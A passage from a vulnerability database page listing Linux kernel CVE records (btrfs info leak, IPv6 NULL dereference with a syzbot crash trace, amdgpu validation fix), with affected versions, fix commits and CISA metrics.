zero-fill the\nmemory.\n\nFix this by using kvzalloc() which zeroes out the memory on allocation."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:25.159Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/689efe22e9b5b7d9d523119a9a5c3c17107a0772"
        },
        {
          "url": "https://git.kernel.org/stable/c/73db209dcd4ae026021234d40cfcb2fb5b564b86"
        },
        {
          "url": "https://git.kernel.org/stable/c/30189e54ba80e3209d34cfeea87b848f6ae025e6"
        },
        {
          "url": "https://git.kernel.org/stable/c/e58047553a4e859dafc8d1d901e1de77c9dd922d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8bdbcfaf3eac42f98e5486b3d7e130fa287811f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/fddc19631c51d9c17d43e9f822a7bc403af88d54"
        },
        {
          "url": "https://git.kernel.org/stable/c/2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf"
        }
      ],
      "title": "btrfs: fix information leak in btrfs_ioctl_logical_to_ino()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35849",
    "datePublished": "2024-05-17T14:47:27.486Z",
    "dateReserved": "2024-05-17T13:50:33.105Z",
    "dateUpdated": "2026-01-05T10:35:25.159Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36901 (GCVE-0-2024-36901)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:29 – Updated: 2025-05-04 09:11

Title

ipv6: prevent NULL dereference in ip6_output()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: prevent NULL dereference in ip6_output() According to syzbot, there is a chance that ip6_dst_idev() returns NULL in ip6_output(). Most places in IPv6 stack deal with a NULL idev just fine, but not here. syzbot reported: general protection fault, probably for non-canonical address 0xdffffc00000000bc: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x00000000000005e0-0x00000000000005e7] CPU: 0 PID: 9775 Comm: syz-executor.4 Not tainted 6.9.0-rc5-syzkaller-00157-g6a30653b604a #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024 RIP: 0010:ip6_output+0x231/0x3f0 net/ipv6/ip6_output.c:237 Code: 3c 1e 00 49 89 df 74 08 4c 89 ef e8 19 58 db f7 48 8b 44 24 20 49 89 45 00 49 89 c5 48 8d 9d e0 05 00 00 48 89 d8 48 c1 e8 03 <42> 0f b6 04 38 84 c0 4c 8b 74 24 28 0f 85 61 01 00 00 8b 1b 31 ff RSP: 0018:ffffc9000927f0d8 EFLAGS: 00010202 RAX: 00000000000000bc RBX: 00000000000005e0 RCX: 0000000000040000 RDX: ffffc900131f9000 RSI: 0000000000004f47 RDI: 0000000000004f48 RBP: 0000000000000000 R08: ffffffff8a1f0b9a R09: 1ffffffff1f51fad R10: dffffc0000000000 R11: fffffbfff1f51fae R12: ffff8880293ec8c0 R13: ffff88805d7fc000 R14: 1ffff1100527d91a R15: dffffc0000000000 FS: 00007f135c6856c0(0000) GS:ffff8880b9400000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000080 CR3: 0000000064096000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> NF_HOOK include/linux/netfilter.h:314 [inline] ip6_xmit+0xefe/0x17f0 net/ipv6/ip6_output.c:358 sctp_v6_xmit+0x9f2/0x13f0 net/sctp/ipv6.c:248 sctp_packet_transmit+0x26ad/0x2ca0 net/sctp/output.c:653 sctp_packet_singleton+0x22c/0x320 net/sctp/outqueue.c:783 sctp_outq_flush_ctrl net/sctp/outqueue.c:914 [inline] sctp_outq_flush+0x6d5/0x3e20 net/sctp/outqueue.c:1212 sctp_side_effects net/sctp/sm_sideeffect.c:1198 [inline] sctp_do_sm+0x59cc/0x60c0 net/sctp/sm_sideeffect.c:1169 sctp_primitive_ASSOCIATE+0x95/0xc0 net/sctp/primitive.c:73 __sctp_connect+0x9cd/0xe30 net/sctp/socket.c:1234 sctp_connect net/sctp/socket.c:4819 [inline] sctp_inet_connect+0x149/0x1f0 net/sctp/socket.c:4834 __sys_connect_file net/socket.c:2048 [inline] __sys_connect+0x2df/0x310 net/socket.c:2065 __do_sys_connect net/socket.c:2075 [inline] __se_sys_connect net/socket.c:2072 [inline] __x64_sys_connect+0x7a/0x90 net/socket.c:2072 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9df3b2474a6279944…
	https://git.kernel.org/stable/c/2272e2db38f2e8592…
	https://git.kernel.org/stable/c/ea0cb87402f774b0e…
	https://git.kernel.org/stable/c/e31b25cc2066d3f2b…
	https://git.kernel.org/stable/c/55f7eb4001ef2a3b4…
	https://git.kernel.org/stable/c/4db783d68b9b39a41…

Impacted products

Vendor

Product

Version

Linux

Affected: 778d80be52699596bf70e0eb0761cf5e1e46088d , < 9df3b2474a627994433a87cbf325a562555b17de (git)
Affected: 778d80be52699596bf70e0eb0761cf5e1e46088d , < 2272e2db38f2e85929278146d7c770f22f528579 (git)
Affected: 778d80be52699596bf70e0eb0761cf5e1e46088d , < ea0cb87402f774b0e1214ffba0f57028b27cf155 (git)
Affected: 778d80be52699596bf70e0eb0761cf5e1e46088d , < e31b25cc2066d3f2b6c38579253882008d4469b0 (git)
Affected: 778d80be52699596bf70e0eb0761cf5e1e46088d , < 55f7eb4001ef2a3b48cf039cf263f9ed0ec5a488 (git)
Affected: 778d80be52699596bf70e0eb0761cf5e1e46088d , < 4db783d68b9b39a411a96096c10828ff5dfada7a (git)

Linux

Affected: 2.6.27
Unaffected: 0 , < 2.6.27 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36901",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-31T18:31:29.092728Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:38.789Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:49.170Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9df3b2474a627994433a87cbf325a562555b17de"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2272e2db38f2e85929278146d7c770f22f528579"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea0cb87402f774b0e1214ffba0f57028b27cf155"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e31b25cc2066d3f2b6c38579253882008d4469b0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/55f7eb4001ef2a3b48cf039cf263f9ed0ec5a488"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4db783d68b9b39a411a96096c10828ff5dfada7a"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_output.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9df3b2474a627994433a87cbf325a562555b17de",
              "status": "affected",
              "version": "778d80be52699596bf70e0eb0761cf5e1e46088d",
              "versionType": "git"
            },
            {
              "lessThan": "2272e2db38f2e85929278146d7c770f22f528579",
              "status": "affected",
              "version": "778d80be52699596bf70e0eb0761cf5e1e46088d",
              "versionType": "git"
            },
            {
              "lessThan": "ea0cb87402f774b0e1214ffba0f57028b27cf155",
              "status": "affected",
              "version": "778d80be52699596bf70e0eb0761cf5e1e46088d",
              "versionType": "git"
            },
            {
              "lessThan": "e31b25cc2066d3f2b6c38579253882008d4469b0",
              "status": "affected",
              "version": "778d80be52699596bf70e0eb0761cf5e1e46088d",
              "versionType": "git"
            },
            {
              "lessThan": "55f7eb4001ef2a3b48cf039cf263f9ed0ec5a488",
              "status": "affected",
              "version": "778d80be52699596bf70e0eb0761cf5e1e46088d",
              "versionType": "git"
            },
            {
              "lessThan": "4db783d68b9b39a411a96096c10828ff5dfada7a",
              "status": "affected",
              "version": "778d80be52699596bf70e0eb0761cf5e1e46088d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_output.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.27"
            },
            {
              "lessThan": "2.6.27",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: prevent NULL dereference in ip6_output()\n\nAccording to syzbot, there is a chance that ip6_dst_idev()\nreturns NULL in ip6_output(). Most places in IPv6 stack\ndeal with a NULL idev just fine, but not here.\n\nsyzbot reported:\n\ngeneral protection fault, probably for non-canonical address 0xdffffc00000000bc: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x00000000000005e0-0x00000000000005e7]\nCPU: 0 PID: 9775 Comm: syz-executor.4 Not tainted 6.9.0-rc5-syzkaller-00157-g6a30653b604a #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\n RIP: 0010:ip6_output+0x231/0x3f0 net/ipv6/ip6_output.c:237\nCode: 3c 1e 00 49 89 df 74 08 4c 89 ef e8 19 58 db f7 48 8b 44 24 20 49 89 45 00 49 89 c5 48 8d 9d e0 05 00 00 48 89 d8 48 c1 e8 03 \u003c42\u003e 0f b6 04 38 84 c0 4c 8b 74 24 28 0f 85 61 01 00 00 8b 1b 31 ff\nRSP: 0018:ffffc9000927f0d8 EFLAGS: 00010202\nRAX: 00000000000000bc RBX: 00000000000005e0 RCX: 0000000000040000\nRDX: ffffc900131f9000 RSI: 0000000000004f47 RDI: 0000000000004f48\nRBP: 0000000000000000 R08: ffffffff8a1f0b9a R09: 1ffffffff1f51fad\nR10: dffffc0000000000 R11: fffffbfff1f51fae R12: ffff8880293ec8c0\nR13: ffff88805d7fc000 R14: 1ffff1100527d91a R15: dffffc0000000000\nFS:  00007f135c6856c0(0000) GS:ffff8880b9400000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020000080 CR3: 0000000064096000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n  NF_HOOK include/linux/netfilter.h:314 [inline]\n  ip6_xmit+0xefe/0x17f0 net/ipv6/ip6_output.c:358\n  sctp_v6_xmit+0x9f2/0x13f0 net/sctp/ipv6.c:248\n  sctp_packet_transmit+0x26ad/0x2ca0 net/sctp/output.c:653\n  sctp_packet_singleton+0x22c/0x320 net/sctp/outqueue.c:783\n  sctp_outq_flush_ctrl net/sctp/outqueue.c:914 [inline]\n  sctp_outq_flush+0x6d5/0x3e20 net/sctp/outqueue.c:1212\n  sctp_side_effects net/sctp/sm_sideeffect.c:1198 [inline]\n  sctp_do_sm+0x59cc/0x60c0 net/sctp/sm_sideeffect.c:1169\n  sctp_primitive_ASSOCIATE+0x95/0xc0 net/sctp/primitive.c:73\n  __sctp_connect+0x9cd/0xe30 net/sctp/socket.c:1234\n  sctp_connect net/sctp/socket.c:4819 [inline]\n  sctp_inet_connect+0x149/0x1f0 net/sctp/socket.c:4834\n  __sys_connect_file net/socket.c:2048 [inline]\n  __sys_connect+0x2df/0x310 net/socket.c:2065\n  __do_sys_connect net/socket.c:2075 [inline]\n  __se_sys_connect net/socket.c:2072 [inline]\n  __x64_sys_connect+0x7a/0x90 net/socket.c:2072\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:11:42.280Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9df3b2474a627994433a87cbf325a562555b17de"
        },
        {
          "url": "https://git.kernel.org/stable/c/2272e2db38f2e85929278146d7c770f22f528579"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea0cb87402f774b0e1214ffba0f57028b27cf155"
        },
        {
          "url": "https://git.kernel.org/stable/c/e31b25cc2066d3f2b6c38579253882008d4469b0"
        },
        {
          "url": "https://git.kernel.org/stable/c/55f7eb4001ef2a3b48cf039cf263f9ed0ec5a488"
        },
        {
          "url": "https://git.kernel.org/stable/c/4db783d68b9b39a411a96096c10828ff5dfada7a"
        }
      ],
      "title": "ipv6: prevent NULL dereference in ip6_output()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36901",
    "datePublished": "2024-05-30T15:29:03.727Z",
    "dateReserved": "2024-05-30T15:25:07.066Z",
    "dateUpdated": "2025-05-04T09:11:42.280Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26922 (GCVE-0-2024-26922)

Vulnerability from cvelistv5 – Published: 2024-04-23 13:05 – Updated: 2025-11-04 17:14

Title

drm/amdgpu: validate the parameters of bo mapping operations more clearly

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate the parameters of bo mapping operations more clearly Verify the parameters of amdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d4da6b084f1c56259…
	https://git.kernel.org/stable/c/f68039375d4d6d673…
	https://git.kernel.org/stable/c/1fd7db5c16028dc07…
	https://git.kernel.org/stable/c/8b12fc7b032633539…
	https://git.kernel.org/stable/c/212e3baccdb193960…
	https://git.kernel.org/stable/c/ef13eeca7c79136bc…
	https://git.kernel.org/stable/c/b1f04b9b1c5317f56…
	https://git.kernel.org/stable/c/6fef2d4c00b5b8561…

Impacted products

Vendor

Product

Version

Linux

Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < d4da6b084f1c5625937d49bb6722c5b4aef11b8d (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < f68039375d4d6d67303674c0ab2d06b7295c0ec9 (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 1fd7db5c16028dc07b2ceec190f2e895dddb532d (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 8b12fc7b032633539acdf7864888b0ebd49e90f2 (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 212e3baccdb1939606420d88f7f52d346b49a284 (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < ef13eeca7c79136bc38e21eb67322c1cbd5c40ee (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < b1f04b9b1c5317f562a455384c5f7473e46bdbaa (git)
Affected: dc54d3d1744d23ed0b345fd8bc1c493b74e8df44 , < 6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75 (git)

Linux

Affected: 4.12
Unaffected: 0 , < 4.12 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:14:43.597Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d4da6b084f1c5625937d49bb6722c5b4aef11b8d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f68039375d4d6d67303674c0ab2d06b7295c0ec9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1fd7db5c16028dc07b2ceec190f2e895dddb532d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b12fc7b032633539acdf7864888b0ebd49e90f2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/212e3baccdb1939606420d88f7f52d346b49a284"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ef13eeca7c79136bc38e21eb67322c1cbd5c40ee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b1f04b9b1c5317f562a455384c5f7473e46bdbaa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26922",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:46:55.644106Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:15.988Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d4da6b084f1c5625937d49bb6722c5b4aef11b8d",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "f68039375d4d6d67303674c0ab2d06b7295c0ec9",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "1fd7db5c16028dc07b2ceec190f2e895dddb532d",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "8b12fc7b032633539acdf7864888b0ebd49e90f2",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "212e3baccdb1939606420d88f7f52d346b49a284",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "ef13eeca7c79136bc38e21eb67322c1cbd5c40ee",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "b1f04b9b1c5317f562a455384c5f7473e46bdbaa",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            },
            {
              "lessThan": "6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75",
              "status": "affected",
              "version": "dc54d3d1744d23ed0b345fd8bc1c493b74e8df44",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.12"
            },
            {
              "lessThan": "4.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: validate the parameters of bo mapping operations more clearly\n\nVerify the parameters of\namdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:59:46.556Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d4da6b084f1c5625937d49bb6722c5b4aef11b8d"
        },
        {
          "url": "https://git.kernel.org/stable/c/f68039375d4d6d67303674c0ab2d06b7295c0ec9"
        },
        {
          "url": "https://git.kernel.org/stable/c/1fd7db5c16028dc07b2ceec190f2e895dddb532d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b12fc7b032633539acdf7864888b0ebd49e90f2"
        },
        {
          "url": "https://git.kernel.org/stable/c/212e3baccdb1939606420d88f7f52d346b49a284"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef13eeca7c79136bc38e21eb67322c1cbd5c40ee"
        },
        {
          "url": "https://git.kernel.org/stable/c/b1f04b9b1c5317f562a455384c5f7473e46bdbaa"
        },
        {
          "url": "https://git.kernel.org/stable/c/6fef2d4c00b5b8561ad68dd2b68173f5c6af1e75"
        }
      ],
      "title": "drm/amdgpu: validate the parameters of bo mapping operations more clearly",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26922",
    "datePublished": "2024-04-23T13:05:04.243Z",
    "dateReserved": "2024-02-19T14:20:24.194Z",
    "dateUpdated": "2025-11-04T17:14:43.597Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26973 (GCVE-0-2024-26973)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:20 – Updated: 2025-05-04 09:01

Title

fat: fix uninitialized field in nostale filehandles

Summary

